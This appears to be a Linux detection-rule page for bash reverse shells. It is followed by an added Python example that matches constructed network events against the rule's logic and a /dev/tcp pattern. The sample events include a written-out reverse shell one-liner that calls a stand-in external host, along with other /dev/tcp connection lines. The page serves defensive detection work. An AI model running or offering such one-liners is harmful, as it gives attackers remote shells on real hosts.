
Summary
This detection rule identifies potential reverse shell activity on Linux hosts by monitoring outbound network connections initiated by the Bash shell. A shell binary normally has no reason to open its own TCP connection; when Bash does, it is usually because a command redirected the shell's input and output to a TCP socket (for example through Bash's /dev/tcp/<host>/<port> pseudo-device), which is the classic one-liner an attacker uses to hand an interactive shell to a remote listener. To reduce false positives, the rule excludes connections to 127.0.0.1 and 0.0.0.0. The rule cannot judge whether a destination is malicious: any connection to a non-excluded address, including private and internal addresses, produces an alert, so matches need triage against expected shell usage on the host. Reverse shells belong to the broader set of techniques threat actors use to execute commands remotely and exfiltrate data.
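The matching logic described above, run over a few constructed events, as an added example. This is not the rule's own query: the event field names (process_name, command_line, dest_ip, dest_port) are assumptions, the sample events are constructed, and the /dev/tcp check is an extra indicator layered on top of the page's bash-plus-non-local-destination condition.

```python
"""Added example of the bash reverse-shell detection logic over constructed events.

Not the detection rule's own query. Field names are assumed, and the sample
events below are constructed for illustration (documentation-range IPs).
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class NetworkEvent:
    process_name: str   # assumed field: executable name or path of the connecting process
    command_line: str   # assumed field: full command line of that process
    dest_ip: str        # assumed field: remote address of the outbound connection
    dest_port: int      # assumed field: remote port


# Process names the page's rule is concerned with (login shells appear as "-bash")
BASH_NAMES = {"bash", "-bash"}

# Destinations the page says the rule filters out to reduce false positives
EXCLUDED_DESTINATIONS = {"127.0.0.1", "0.0.0.0"}

# Bash's /dev/tcp/<host>/<port> pseudo-device, the usual way a bash one-liner
# redirects its stdin/stdout to a TCP socket
DEV_TCP_REDIRECT = re.compile(r"/dev/tcp/[^/\s]+/\d+")


def is_bash_process(process_name: str) -> bool:
    """True when the connecting process is Bash (path prefixes stripped)."""
    return process_name.rsplit("/", 1)[-1] in BASH_NAMES


def is_excluded_destination(dest_ip: str) -> bool:
    """True for the literal local addresses the rule ignores."""
    return dest_ip in EXCLUDED_DESTINATIONS


def redirects_to_tcp(command_line: str) -> bool:
    """Secondary indicator: the command line itself redirects I/O to /dev/tcp."""
    return DEV_TCP_REDIRECT.search(command_line) is not None


def is_candidate(event: NetworkEvent) -> bool:
    """Core condition: Bash opened an outbound connection to a non-excluded address."""
    return is_bash_process(event.process_name) and not is_excluded_destination(event.dest_ip)


def detect(events):
    """Return the events that match the rule, in input order."""
    return [ev for ev in events if is_candidate(ev)]


# Constructed sample events (not real telemetry)
SAMPLE_EVENTS = [
    # Classic interactive reverse shell to an external listener: should match
    NetworkEvent("/usr/bin/bash", "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1",
                 "203.0.113.10", 4444),
    # Bash talking to a local service on loopback: excluded by the rule
    NetworkEvent("bash", "bash -c 'exec 3<>/dev/tcp/127.0.0.1/8080'",
                 "127.0.0.1", 8080),
    # curl, not bash, reaching the same external host: outside the rule's scope
    NetworkEvent("curl", "curl http://203.0.113.10/", "203.0.113.10", 80),
    # Bash reaching an internal host: still matches, private ranges are not excluded
    NetworkEvent("-bash", "bash -c 'cat < /dev/tcp/10.0.0.5/9001'",
                 "10.0.0.5", 9001),
    # Unspecified address: excluded by the rule
    NetworkEvent("bash", "bash -c 'exec 4<>/dev/tcp/0.0.0.0/22'", "0.0.0.0", 22),
]


if __name__ == "__main__":
    for ev in detect(SAMPLE_EVENTS):
        confidence = "high" if redirects_to_tcp(ev.command_line) else "medium"
        print(f"[{confidence}] {ev.process_name} -> {ev.dest_ip}:{ev.dest_port}  {ev.command_line}")
```

The fourth sample event is the one to keep in mind during triage: the rule only excludes the two literal local addresses, so a connection to an internal host still alerts. That is the right default, since an attacker who already has a foothold inside the network is a common source of reverse shells, but it also means routine /dev/tcp port checks from scripts will surface and need to be handled by allow-listing the specific parent process or command line rather than by excluding whole private ranges.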
Categories
- Linux
- Network
Data Sources
- Process
- Network Traffic
- Application Log
Created: 2021-10-16